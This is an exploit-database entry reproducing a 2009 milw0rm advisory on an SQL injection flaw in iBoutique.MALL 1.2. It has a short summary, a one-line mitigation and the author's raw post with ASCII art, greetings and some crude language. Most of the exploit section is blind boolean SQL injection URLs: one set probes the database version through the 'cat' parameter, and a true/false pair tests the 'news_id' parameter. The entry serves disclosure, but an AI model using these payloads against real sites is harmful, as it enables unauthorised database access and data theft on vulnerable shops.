iBoutique.MALL 1.2 SQL Injection Vulnerability

vendor:

iBoutique.MALL

by:

Cyb3r-1sT

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: iBoutique.MALL

Affected Version From: 1.2

Affected Version To: 1.2

Patch Exists: NO

Related CWE: N/A

CPE: a:netart_media:iboutique.mall

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

iBoutique.MALL 1.2 SQL Injection Vulnerability

iBoutique.MALL 1.2 is vulnerable to SQL injection. An attacker can exploit this vulnerability by sending malicious SQL queries to the application. This can be done by manipulating the 'cat' and 'news_id' parameters in the URL. For example, an attacker can send the following URL to the application: http://www.Cyb3r-1st.com/[path]/index.php?mod=products&cat=230+and+substring(@@version,1,1)=5. This will return the version of the database if the application is vulnerable.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in an SQL query.

Source

Exploit-DB raw data:

                          ||          ||   | ||        
                   o_,_7 _||  . _o_7 _|| 4_|_||  o_w_, 
                  ( :   /    (_)    /           (   .  
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
|     _                   __           __       __          ______     |
|   /' \            __  /'__`\        /\ \__  /'__`\       /\  ___\    |
|  /\_, \    ___   /\_\/\_\L\ \    ___\ \ ,_\/\ \/\ \  _ __\ \ \__/    |
|  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\ \___``\  |
|     \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |
|      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\  \ \____/ |
|       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/   \/___/  |
|                  \ \____/ >> Kings of injection                      |
|                   \/___/                                             |
|                                                                      |
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|


<<!>> Found by  :  Cyb3r-1sT

<<!>> C0ntact : cyb3r-1st [at] hotmail.com 
                   
=======================================================
+++++++++++++++++++ Script information+++++++++++++++++
=======================================================

<<->> script   :: iBoutique.MALL 1.2

<<->> download :: http://www.netartmedia.net/mall/
 
=======================================================
+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
=======================================================


<<->> Exploit :: 
 
                  >>>>>>> http://www.Cyb3r-1st.com/[path]/index.php?mod=products&cat=230+and+substring(@@version,1,1)=5

                  >>>>>>> http://www.Cyb3r-1st.com/[path]/index.php?mod=products&cat=230+and+substring(@@version,1,1)=4

                  Note : Dont froget to change catid  
          
                  >>>>>>> http://www.Cyb3r-1st.com/[path]/index.php?page_id=-1&news_id=1 >>>> true

                  >>>>>>> http://www.Cyb3r-1st.com/[path]/index.php?page_id=-1&news_id=1 >>>> false

=======================================================
++++++++++++++++++++++ Greetz +++++++++++++++++++++++++
=======================================================

<<->> All freinds , [ www.tryag.com ] , [ www.7rs.org ] , [ sec-code.com ]

<<->> special greetz to ( tryag academy members ) , His0k4 have agood priv8 exploit for big famous program   :)  

<<->> and the guy whose unknown called HCJ :> hhhhhhhh just joke bro ... fuck to the lamerz who made u angry ^_* 

# milw0rm.com [2009-09-15]